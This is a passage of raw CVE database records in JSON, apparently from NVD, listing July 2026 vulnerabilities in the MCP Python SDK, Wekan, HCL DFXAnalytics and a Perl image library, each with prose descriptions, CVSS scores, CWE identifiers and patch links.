Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-200"},{"lang":"en","value":"CWE-863"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:n8n-mcp:n8n-mcp:*:*:*:*:*:*:*:*","versionEndExcluding":"2.57.4","matchCriteriaId":"D8421EBD-1A54-4D99-B9E3-46176539C254"}]}]}],"references":[{"url":"https://github.com/czlonkowski/n8n-mcp/commit/1f42899749ed0c584fb6b4fd63d75233c3edee59","source":"security-advisories@github.com","tags":["Patch"]},{"url":"https://github.com/czlonkowski/n8n-mcp/releases/tag/v2.57.4","source":"security-advisories@github.com","tags":["Release Notes"]},{"url":"https://github.com/czlonkowski/n8n-mcp/security/advisories/GHSA-2cf7-hpwf-47h9","source":"security-advisories@github.com","tags":["Mitigation","Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-59950","sourceIdentifier":"security-advisories@github.com","published":"2026-07-15T21:16:55.683","lastModified":"2026-07-17T18:07:38.087","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"The MCP Python SDK, called mcp on PyPI, is a Python implementation of the Model Context Protocol (MCP). Prior to 1.28.1, the deprecated mcp.server.websocket.websocket_server transport accepted WebSocket handshakes without applying Host or Origin header validation, leaving no SDK-level way to restrict which origins could connect to applications that exposed that transport. This issue is fixed in version 1.28.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"modelcontextprotocol","product":"python-sdk","versions":[{"version":"< 1.28.1","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":7.6,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"NONE","userInteraction":"PASSIVE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":5.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T12:28:09.718600Z","id":"CVE-2026-59950","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-346"},{"lang":"en","value":"CWE-1385"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:lfprojects:mcp_python_sdk:*:*:*:*:*:*:*:*","versionEndExcluding":"1.28.1","matchCriteriaId":"E0A716F9-2B03-4AA1-8033-397778EF3981"}]}]}],"references":[{"url":"https://github.com/modelcontextprotocol/python-sdk/commit/777b8d06710c140e3606b0d4598e2aa48546c266","source":"security-advisories@github.com","tags":["Patch"]},{"url":"https://github.com/modelcontextprotocol/python-sdk/pull/2992","source":"security-advisories@github.com","tags":["Issue Tracking","Patch"]},{"url":"https://github.com/modelcontextprotocol/python-sdk/releases/tag/v1.28.1","source":"security-advisories@github.com","tags":["Release Notes"]},{"url":"https://github.com/modelcontextprotocol/python-sdk/security/advisories/GHSA-vj7q-gjh5-988w","source":"security-advisories@github.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-52891","sourceIdentifier":"security-advisories@github.com","published":"2026-07-15T22:17:16.450","lastModified":"2026-07-17T19:17:16.647","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Wekan is open source kanban built with Meteor. Prior to 9.07, Wekan avatar upload functionality embeds user-supplied filenames into paths later passed to child_process.exec() for MIME-type detection. Because models/avatars.js and models/fileValidation.js used a shell command with the avatar filename, shell metacharacters such as backticks and $() in the filename could execute commands on the server. This issue is fixed in version 9.07."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"wekan","product":"wekan","versions":[{"version":"< 9.07","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H","baseScore":9.9,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.1,"impactScore":6.0}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T18:23:06.206379Z","id":"CVE-2026-52891","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-78"},{"lang":"en","value":"CWE-88"}]}],"references":[{"url":"https://github.com/wekan/wekan/commit/a4c74a5980e9f778eb444fd346f32aa3d16786a9","source":"security-advisories@github.com"},{"url":"https://github.com/wekan/wekan/releases/tag/v9.07","source":"security-advisories@github.com"},{"url":"https://github.com/wekan/wekan/security/advisories/GHSA-35j7-h385-2q9g","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-35140","sourceIdentifier":"psirt@hcl.com","published":"2026-07-16T14:16:50.633","lastModified":"2026-07-17T17:00:19.947","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"HCL DFXAnalytics is affected by a Missing Secure Attribute in Encrypted Session (SSL) Cookie vulnerability. The application fails to set the \"secure\" attribute on session cookies generated during authentication, which could allow a remote attacker to intercept network traffic and capture sensitive cookies, session tokens, or credentials sent in cleartext over unencrypted channels."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCL Software","product":"DFXAnalytics","defaultStatus":"unaffected","versions":[{"version":"version 3.0 and below","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N","baseScore":3.0,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":1.3,"impactScore":1.4},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N","baseScore":7.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T14:16:18.079717Z","id":"CVE-2026-35140","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-200"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:hcltech:dfxanalytics:*:*:*:*:*:*:*:*","versionEndIncluding":"3.0","matchCriteriaId":"31591778-5688-42DF-B427-9D401C4D2DB5"}]}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0131787","source":"psirt@hcl.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-35141","sourceIdentifier":"psirt@hcl.com","published":"2026-07-16T14:16:50.747","lastModified":"2026-07-17T16:44:13.810","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"HCL DFXAnalytics is affected by a Login Replay Attack vulnerability. The application allows a remote attacker to intercept, delay, or fraudulently retransmit valid authentication data to achieve unauthorized access. To mitigate this risk, the application must implement a mechanism to include timestamps with every message, ensuring that messages exceeding a specific age threshold are automatically rejected by the recipient system."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCL Software","product":"DFXAnalytics","defaultStatus":"unaffected","versions":[{"version":"version 3.0 and below","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:N/I:L/A:N","baseScore":2.6,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"HIGH","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":1.0,"impactScore":1.4},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T14:15:48.224344Z","id":"CVE-2026-35141","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-294"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:hcltech:dfxanalytics:*:*:*:*:*:*:*:*","versionEndIncluding":"3.0","matchCriteriaId":"31591778-5688-42DF-B427-9D401C4D2DB5"}]}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0131787","source":"psirt@hcl.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-35142","sourceIdentifier":"psirt@hcl.com","published":"2026-07-16T14:16:50.863","lastModified":"2026-07-17T16:27:03.640","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"HCL DFXAnalytics is affected by an Internal IP Address Disclosure vulnerability. The application includes internal IP address details within its generated server responses, which could allow a remote attacker to gather sensitive network topology information and use it to map the internal infrastructure for further targeted attacks."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCL Software","product":"DFXAnalytics","defaultStatus":"unaffected","versions":[{"version":"version 3.0 and below","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:N/I:L/A:N","baseScore":2.6,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"HIGH","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":1.0,"impactScore":1.4},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N","baseScore":8.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":4.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T14:14:43.840489Z","id":"CVE-2026-35142","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-200"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:hcltech:dfxanalytics:*:*:*:*:*:*:*:*","versionEndIncluding":"3.0","matchCriteriaId":"31591778-5688-42DF-B427-9D401C4D2DB5"}]}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0131787","source":"psirt@hcl.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-35143","sourceIdentifier":"psirt@hcl.com","published":"2026-07-16T14:16:50.973","lastModified":"2026-07-17T16:22:20.560","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"HCL DFXAnalytics is affected by a Missing SameSite Attribute vulnerability. The application fails to set the \"SameSite\" attribute on session cookies generated during authentication, which could allow a remote attacker to execute Cross-Site Request Forgery (CSRF) attacks if additional mitigations, such as Anti-CSRF tokens, are not implemented."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCL Software","product":"DFXAnalytics","defaultStatus":"unaffected","versions":[{"version":"version 3.0 and below","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N","baseScore":3.0,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":1.3,"impactScore":1.4},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T13:45:13.427420Z","id":"CVE-2026-35143","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-200"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-352"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:hcltech:dfxanalytics:*:*:*:*:*:*:*:*","versionEndIncluding":"3.0","matchCriteriaId":"31591778-5688-42DF-B427-9D401C4D2DB5"}]}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0131787","source":"psirt@hcl.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-35145","sourceIdentifier":"psirt@hcl.com","published":"2026-07-16T14:16:51.123","lastModified":"2026-07-17T19:03:57.607","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"HCL DFXAnalytics is affected by a Missing HTTP Strict-Transport-Security Header vulnerability. The application fails to implement the HTTP Strict Transport Security (HSTS) policy within its responses, which could allow a remote attacker to downgrade the communication channel to an unencrypted connection (HTTP) and conduct man-in-the-middle (MitM) attacks. To remediate this, the application must include the \"Strict-Transport-Security\" header in all web application responses."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCL Software","product":"DFXAnalytics","defaultStatus":"unaffected","versions":[{"version":"version 3.0 and below","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N","baseScore":3.1,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":1.6,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T13:44:49.945827Z","id":"CVE-2026-35145","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-200"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:hcltech:dfxanalytics:*:*:*:*:*:*:*:*","versionEndIncluding":"3.0","matchCriteriaId":"31591778-5688-42DF-B427-9D401C4D2DB5"}]}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0131787","source":"psirt@hcl.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-56453","sourceIdentifier":"psirt@hcl.com","published":"2026-07-16T14:16:54.497","lastModified":"2026-07-17T19:09:35.767","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"HCL DFXAnalytics is affected by an Account Takeover via Response Manipulation vulnerability. A remote attacker can intercept and alter the contents of the server's HTTP responses before they reach the client application, allowing them to manipulate the authentication or authorization logic to bypass controls and gain unauthorized access to targeted user accounts."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCL Software","product":"DFXAnalytics","defaultStatus":"unaffected","versions":[{"version":"version 3.0 and below","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L","baseScore":5.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":1.3,"impactScore":3.7},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T13:42:25.544927Z","id":"CVE-2026-56453","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-294"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:hcltech:dfxanalytics:*:*:*:*:*:*:*:*","versionEndIncluding":"3.0","matchCriteriaId":"31591778-5688-42DF-B427-9D401C4D2DB5"}]}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0131787","source":"psirt@hcl.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-56454","sourceIdentifier":"psirt@hcl.com","published":"2026-07-16T14:16:54.643","lastModified":"2026-07-17T19:10:04.607","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"HCL DFXAnalytics is affected by a Deprecated Protocol vulnerability due to the use of TLS 1.0 and TLS 1.1. These legacy protocols contain numerous cryptographic design flaws that expose data to interception and decryption. To remediate this risk, the application must disable all support for TLS 1.0 and TLS 1.1, and exclusively enable support for secure protocols, specifically TLS 1.2 and TLS 1.3."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCL Software","product":"DFXAnalytics","defaultStatus":"unaffected","versions":[{"version":"version 3.0 and below","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":5.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.2,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T13:41:11.631048Z","id":"CVE-2026-56454","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-327"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:hcltech:dfxanalytics:*:*:*:*:*:*:*:*","versionEndIncluding":"3.0","matchCriteriaId":"31591778-5688-42DF-B427-9D401C4D2DB5"}]}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0131787","source":"psirt@hcl.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-56455","sourceIdentifier":"psirt@hcl.com","published":"2026-07-16T14:16:54.797","lastModified":"2026-07-17T19:10:42.027","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"HCL DFXAnalytics is affected by a Buffer Overflow vulnerability that can lead to a Denial of Service (DoS). The application fails to properly validate input sizes, allowing an attacker to pass an excessive amount of information into a memory container, which can cause the system to crash or become unresponsive. To mitigate this flaw, comprehensive input length checks must be implemented and enforced on both the client and server sides."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCL Software","product":"DFXAnalytics","defaultStatus":"unaffected","versions":[{"version":"version 3.0 and below","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":1.4},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T13:34:50.272220Z","id":"CVE-2026-56455","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-121"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:hcltech:dfxanalytics:*:*:*:*:*:*:*:*","versionEndIncluding":"3.0","matchCriteriaId":"31591778-5688-42DF-B427-9D401C4D2DB5"}]}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0131787","source":"psirt@hcl.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-56456","sourceIdentifier":"psirt@hcl.com","published":"2026-07-16T14:16:54.943","lastModified":"2026-07-17T19:11:30.197","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"HCL DFXAnalytics is affected by an Internal File Path Disclosure vulnerability. The application dashboard inadvertently leaks sensitive information regarding its internal file structure and directory paths through unhandled error messages, system logs, or debugging output, which could allow a remote attacker to map the underlying server environment and identify targets for further exploitation."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCL Software","product":"DFXAnalytics","defaultStatus":"unaffected","versions":[{"version":"version 3.0 and below","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T14:12:41.362674Z","id":"CVE-2026-56456","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-200"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:hcltech:dfxanalytics:*:*:*:*:*:*:*:*","versionEndIncluding":"3.0","matchCriteriaId":"31591778-5688-42DF-B427-9D401C4D2DB5"}]}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0131787","source":"psirt@hcl.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-3031","sourceIdentifier":"9b29abf9-4ab0-4765-b253-1875cd9b441e","published":"2026-07-16T17:16:55.633","lastModified":"2026-07-17T19:17:13.403","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Image::EPEG versions through 0.15 for Perl embeds an unsupported version of the Epeg library.\n\nImage::EPEG includes Epeg 0.9.0 that was last updated in 2004.\n\nEpeg is a fast JPEG thumbnail library that was once part of the Englightenment 